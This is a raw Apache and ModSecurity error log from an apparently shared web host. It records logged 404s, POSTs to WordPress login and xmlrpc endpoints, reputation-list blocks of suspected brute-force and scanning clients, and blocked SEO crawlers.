[Tue May 26 13:40:38.748298 2026] [security2:error] [pid 544395:tid 544583] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVfhmrs7g3RMCdp8XOswAAADo"]
[Tue May 26 13:40:40.850009 2026] [security2:error] [pid 536875:tid 537103] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVgOr_-FTveSGlx1Hu3wAAAOc"]
[Tue May 26 13:40:41.643320 2026] [security2:error] [pid 544395:tid 544630] [client 2604:a880:400:d1:0:2:7264:7001:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVVgBmrs7g3RMCdp8XO2gAAaWc"], referer: https://kingsclub.in/wp-login.php
[Tue May 26 13:40:42.894187 2026] [security2:error] [pid 536875:tid 537123] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVgur_-FTveSGlx1Hu_wAAAPs"]
[Tue May 26 13:40:44.902777 2026] [security2:error] [pid 536875:tid 537125] [client 129.222.147.134:38155] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVhOr_-FTveSGlx1HvEwAAAP0"]
[Tue May 26 13:40:44.906553 2026] [security2:error] [pid 536875:tid 537125] [client 129.222.147.134:38155] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVhOr_-FTveSGlx1HvEwAAAP0"]
[Tue May 26 13:40:45.067480 2026] [security2:error] [pid 536875:tid 537048] [client 106.192.248.115:64256] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVher_-FTveSGlx1HvFQAAALA"]
[Tue May 26 13:40:45.067595 2026] [security2:error] [pid 536875:tid 537048] [client 106.192.248.115:64256] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVher_-FTveSGlx1HvFQAAALA"]
[Tue May 26 13:40:45.083000 2026] [security2:error] [pid 536875:tid 537035] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVhOr_-FTveSGlx1HvDwAAAKM"]
[Tue May 26 13:40:46.394678 2026] [security2:error] [pid 544395:tid 544648] [client 74.249.173.207:2571] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "finclass.africa.thedebateafrica.org"] [uri "/wk/index.php"] [unique_id "ahVVhhmrs7g3RMCdp8XPNgAAAHs"]
[Tue May 26 13:40:47.071860 2026] [security2:error] [pid 536875:tid 537115] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVhur_-FTveSGlx1HvIAAAAPM"]
[Tue May 26 13:40:48.213149 2026] [security2:error] [pid 544395:tid 544617] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVhxmrs7g3RMCdp8XPSAAAAFw"]
[Tue May 26 13:40:49.871706 2026] [security2:error] [pid 536875:tid 537037] [client 14.189.0.226:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVier_-FTveSGlx1HvMgAAAKU"]
[Tue May 26 13:40:50.399914 2026] [security2:error] [pid 544395:tid 544560] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVViRmrs7g3RMCdp8XPagAAACM"]
[Tue May 26 13:40:50.428271 2026] [security2:error] [pid 544395:tid 544633] [client 185.165.240.73:58645] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVViRmrs7g3RMCdp8XPaAAAAGw"], referer: https://www.cagmedya.com/
[Tue May 26 13:40:51.117906 2026] [security2:error] [pid 536875:tid 537032] [client 47.128.37.26:48968] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "kexcouriers.com"] [uri "/robots.txt"] [unique_id "ahVVi-r_-FTveSGlx1HvTAAAAKA"]
[Tue May 26 13:40:52.061099 2026] [security2:error] [pid 536875:tid 537107] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVi-r_-FTveSGlx1HvUgAAAOs"]
[Tue May 26 13:40:54.198903 2026] [autoindex:error] [pid 544395:tid 544534] [client 66.249.79.137:50764] AH01276: Cannot serve directory /home1/newde164/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:40:54.556900 2026] [security2:error] [pid 536875:tid 537112] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVjur_-FTveSGlx1HvagAAAPA"]
[Tue May 26 13:40:55.381887 2026] [security2:error] [pid 544395:tid 544644] [client 129.222.147.134:39829] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVjxmrs7g3RMCdp8XPzgAAAHc"]
[Tue May 26 13:40:55.382078 2026] [security2:error] [pid 544395:tid 544644] [client 129.222.147.134:39829] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVjxmrs7g3RMCdp8XPzgAAAHc"]
[Tue May 26 13:40:55.594926 2026] [security2:error] [pid 544395:tid 544603] [client 106.192.248.115:64562] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVjxmrs7g3RMCdp8XP0gAAAE4"]
[Tue May 26 13:40:55.595079 2026] [security2:error] [pid 544395:tid 544603] [client 106.192.248.115:64562] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVjxmrs7g3RMCdp8XP0gAAAE4"]
[Tue May 26 13:40:56.334322 2026] [security2:error] [pid 544395:tid 544565] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVjxmrs7g3RMCdp8XP2gAAACg"]
[Tue May 26 13:40:58.638028 2026] [security2:error] [pid 544395:tid 544582] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVkhmrs7g3RMCdp8XP8QAAADk"]
[Tue May 26 13:41:00.526211 2026] [security2:error] [pid 544395:tid 544635] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVlBmrs7g3RMCdp8XQGQAAAG4"]
[Tue May 26 13:41:02.867500 2026] [security2:error] [pid 544395:tid 544644] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVlhmrs7g3RMCdp8XQrQAAAHc"]
[Tue May 26 13:41:04.494980 2026] [security2:error] [pid 544395:tid 544647] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVmBmrs7g3RMCdp8XQygAAAHo"]
[Tue May 26 13:41:05.585396 2026] [security2:error] [pid 544395:tid 544620] [client 129.222.147.134:36570] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVmRmrs7g3RMCdp8XQ1QAAAF8"]
[Tue May 26 13:41:05.585524 2026] [security2:error] [pid 544395:tid 544620] [client 129.222.147.134:36570] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVmRmrs7g3RMCdp8XQ1QAAAF8"]
[Tue May 26 13:41:06.437050 2026] [security2:error] [pid 544395:tid 544563] [client 66.249.66.78:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahVVmhmrs7g3RMCdp8XQ3QAAACY"]
[Tue May 26 13:41:06.454935 2026] [security2:error] [pid 544395:tid 544625] [client 106.192.248.115:64878] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVmhmrs7g3RMCdp8XQ4QAAAGQ"]
[Tue May 26 13:41:06.455043 2026] [security2:error] [pid 544395:tid 544625] [client 106.192.248.115:64878] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVmhmrs7g3RMCdp8XQ4QAAAGQ"]
[Tue May 26 13:41:06.556304 2026] [security2:error] [pid 536875:tid 537020] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVmur_-FTveSGlx1Hv6AAAAJQ"]
[Tue May 26 13:41:07.956300 2026] [security2:error] [pid 544395:tid 544610] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVmxmrs7g3RMCdp8XQ8wAAAFU"]
[Tue May 26 13:41:09.603584 2026] [security2:error] [pid 536875:tid 537084] [client 62.244.225.226:33921] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cagmedya.com"] [uri "/index.php"] [unique_id "ahVVner_-FTveSGlx1HwBwAAANQ"]
[Tue May 26 13:41:09.869873 2026] [fcgid:warn] [pid 536875:tid 537119] (70014)End of file found: [client 66.132.172.142:7270] mod_fcgid: can't get data from http client
[Tue May 26 13:41:10.565025 2026] [security2:error] [pid 536875:tid 537048] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVnur_-FTveSGlx1HwFwAAALA"]
[Tue May 26 13:41:12.371274 2026] [security2:error] [pid 536875:tid 537103] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVn-r_-FTveSGlx1HwJwAAAOc"]
[Tue May 26 13:41:12.833155 2026] [security2:error] [pid 536875:tid 537131] [client 113.169.94.112:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVoOr_-FTveSGlx1HwKwAAAQM"]
[Tue May 26 13:41:14.693460 2026] [security2:error] [pid 544395:tid 544525] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVohmrs7g3RMCdp8XRSwAAAAA"]
[Tue May 26 13:41:14.839468 2026] [security2:error] [pid 536875:tid 537072] [client 66.249.64.161:39171] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVVoer_-FTveSGlx1HwTAAAAMg"], referer: http://doyecpa.com/prizes/302900662%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20class=
[Tue May 26 13:41:15.117169 2026] [security2:error] [pid 544395:tid 544598] [client 104.28.119.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVVoRmrs7g3RMCdp8XROQAAAEk"]
[Tue May 26 13:41:15.703755 2026] [security2:error] [pid 536875:tid 537129] [client 129.222.147.134:27647] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVo-r_-FTveSGlx1HwfwAAAQE"]
[Tue May 26 13:41:15.703846 2026] [security2:error] [pid 536875:tid 537129] [client 129.222.147.134:27647] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVo-r_-FTveSGlx1HwfwAAAQE"]
[Tue May 26 13:41:16.441220 2026] [security2:error] [pid 544395:tid 544617] [client 106.192.248.115:65186] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVpBmrs7g3RMCdp8XRZQAAAFw"]
[Tue May 26 13:41:16.441317 2026] [security2:error] [pid 544395:tid 544617] [client 106.192.248.115:65186] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVpBmrs7g3RMCdp8XRZQAAAFw"]
[Tue May 26 13:41:16.449564 2026] [security2:error] [pid 544395:tid 544644] [client 66.249.66.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.cagmedya.com"] [uri "/index.php"] [unique_id "ahVVpBmrs7g3RMCdp8XRXgAAAHc"]
[Tue May 26 13:41:17.135441 2026] [security2:error] [pid 544395:tid 544622] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVpBmrs7g3RMCdp8XRaQAAAGE"]
[Tue May 26 13:41:18.492434 2026] [security2:error] [pid 544395:tid 544592] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVphmrs7g3RMCdp8XRiAAAAEM"]
[Tue May 26 13:41:20.407398 2026] [security2:error] [pid 544395:tid 544617] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVpxmrs7g3RMCdp8XRnQAAAFw"]
[Tue May 26 13:41:21.555740 2026] [fcgid:warn] [pid 536875:tid 537113] (70014)End of file found: [client 66.132.224.89:58782] mod_fcgid: can't get data from http client
[Tue May 26 13:41:21.616610 2026] [security2:error] [pid 536875:tid 537126] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVqer_-FTveSGlx1HwsgAAAP4"]
[Tue May 26 13:41:26.098787 2026] [security2:error] [pid 544395:tid 544532] [client 129.222.147.134:17362] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVrRmrs7g3RMCdp8XR_QAAAAc"]
[Tue May 26 13:41:26.098935 2026] [security2:error] [pid 544395:tid 544532] [client 129.222.147.134:17362] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVrRmrs7g3RMCdp8XR_QAAAAc"]
[Tue May 26 13:41:27.054481 2026] [security2:error] [pid 544395:tid 544546] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVrhmrs7g3RMCdp8XSDAAAABU"]
[Tue May 26 13:41:27.340699 2026] [security2:error] [pid 536875:tid 537013] [client 14.240.91.77:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahVVr-r_-FTveSGlx1Hw9QAAAI0"]
[Tue May 26 13:41:27.465927 2026] [security2:error] [pid 536875:tid 537091] [client 106.192.248.115:65502] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVr-r_-FTveSGlx1Hw-AAAANs"]
[Tue May 26 13:41:27.466082 2026] [security2:error] [pid 536875:tid 537091] [client 106.192.248.115:65502] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVr-r_-FTveSGlx1Hw-AAAANs"]
[Tue May 26 13:41:28.120377 2026] [security2:error] [pid 536875:tid 537044] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVr-r_-FTveSGlx1Hw_AAAAKw"]
[Tue May 26 13:41:28.506171 2026] [security2:error] [pid 544395:tid 544538] [client 14.177.100.124:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahVVsBmrs7g3RMCdp8XSJwAAAA0"]
[Tue May 26 13:41:30.177143 2026] [security2:error] [pid 544395:tid 544639] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVsRmrs7g3RMCdp8XSRAAAAHI"]
[Tue May 26 13:41:32.533999 2026] [security2:error] [pid 536875:tid 537038] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVtOr_-FTveSGlx1HxHgAAAKY"]
[Tue May 26 13:41:33.516653 2026] [security2:error] [pid 544395:tid 544557] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVtRmrs7g3RMCdp8XSfwAAACA"]
[Tue May 26 13:41:35.449072 2026] [security2:error] [pid 536875:tid 537045] [client 85.208.96.209:26800] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVVt-r_-FTveSGlx1HxOAAAAK0"]
[Tue May 26 13:41:35.449191 2026] [security2:error] [pid 536875:tid 537045] [client 85.208.96.209:26800] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVVt-r_-FTveSGlx1HxOAAAAK0"]
[Tue May 26 13:41:36.114785 2026] [security2:error] [pid 544395:tid 544549] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVtxmrs7g3RMCdp8XSuQAAABg"]
[Tue May 26 13:41:36.243423 2026] [security2:error] [pid 544395:tid 544618] [client 129.222.147.134:29343] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVuBmrs7g3RMCdp8XSxAAAAF0"]
